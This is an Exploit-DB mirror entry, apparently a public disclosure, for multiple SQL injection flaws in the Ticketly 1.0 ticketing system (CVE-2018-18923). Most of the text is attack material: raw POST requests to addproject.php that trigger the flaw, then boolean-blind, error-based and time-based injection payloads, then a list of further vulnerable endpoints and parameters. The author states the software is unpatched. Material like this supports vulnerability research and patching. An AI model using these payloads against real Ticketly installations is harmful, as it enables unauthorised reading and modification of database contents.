bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45902.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

79 lines
No EOL
2.7 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Ticketly 1.0 Multiple SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-18923
# 1. Technical Description:
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
# resources through POST. This allows a attacker to read and modify
# sensitive information from the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22&description=Test
---
# 2.2 In another request, add two ' to receive a code 200 OK
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22%22&description=Test
---
# 3. Payloads
# 3.1 Payload (boolean-based blind)
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
# 3.2 Payload (error-based)
name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
#3.3 Payload (AND/OR time-based blind)
name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
# 4. Vulnerables resources and parameters
# /action/addproject.php (description, name, category_id and description)
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
# /reports.php (kind_id y status_id)
# 5. Timeline
# 24/07/2018 Discovery
# 24/07/2018 Contact with developer
# 24/07/2018 Solution to vulnerability as pending
# 02/11/2018 Request ID CVE
# 04/11/2018 Assigned CVE-2018-18923
# 05/11/2018 Public disclosure
# 6. References:
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
Reference in a new issue View git blame Copy permalink